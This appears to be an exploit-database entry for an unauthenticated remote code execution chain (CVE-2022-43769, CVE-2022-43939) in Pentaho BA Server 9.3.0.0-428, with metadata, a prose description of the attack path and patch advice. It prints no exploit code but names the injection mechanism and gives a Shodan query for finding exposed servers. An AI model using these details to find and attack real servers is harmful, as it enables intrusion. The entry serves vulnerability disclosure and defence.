Vendor: Pentaho BA Server
By: dwbzn
CVSS: 9.8 (CRITICAL)
Category: Remote Code Execution (RCE)
CWE: 78
Product Name: Pentaho BA Server
Affected Version From: 9.3.0.0-428
Affected Version To: 9.3.0.0-428
Patch Exists: YES
Related CVE: CVE-2022-43769, CVE-2022-43939
CPE: a:hitachivantara:pentaho_ba_server:9.3.0.0-428
Tags: packetstorm,cve,cve2022,rce,ssti,pentaho,kev
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Nuclei References:
https://support.pentaho.com/hc/en-us/articles/14455561548301--Resolved-Pentaho-BA-Server-Failure-to-Sanitize-Special-Elements-into-a-Different-Plane-Special-Element-Injection-Versions-before-9-4-0-1-and-9-3-0-2-including-8-3-x-Impacted-CVE-2022-43769-, https://nvd.nist.gov/vuln/detail/CVE-2022-43769, http://packetstormsecurity.com/files/172296/Pentaho-Business-Server-Authentication-Bypass-SSTI-Code-Execution.html
Nuclei Metadata: {'max-request': 1, 'shodan-query': 'http.favicon.hash:1749354953', 'verified': True, 'vendor': 'hitachi', 'product': 'vantara_pentaho_business_analytics_server'}
Platforms Tested: Windows 11
2022
Pentaho BA Server EE 9.3.0.0-428 – Remote Code Execution (RCE) (Unauthenticated)
This exploit allows an unauthenticated attacker to execute arbitrary code on the vulnerable system by chaining two vulnerabilities, CVE-2022-43769 and CVE-2022-43939. It works by sending a single specially crafted request to the server that carries the command to be executed. The command is supplied in a URL parameter and is run on the server through Java's Runtime.getRuntime().exec() method.
Mitigation:
The best way to mitigate this vulnerability is to ensure that all systems are running a fixed version of the software: per the vendor advisory linked above, versions before 9.4.0.1 and 9.3.0.2 (including 8.3.x) are affected, so verify that the deployed build is at or beyond those releases. Additionally, it is recommended to restrict network access to the Pentaho BA Server to trusted users and networks only.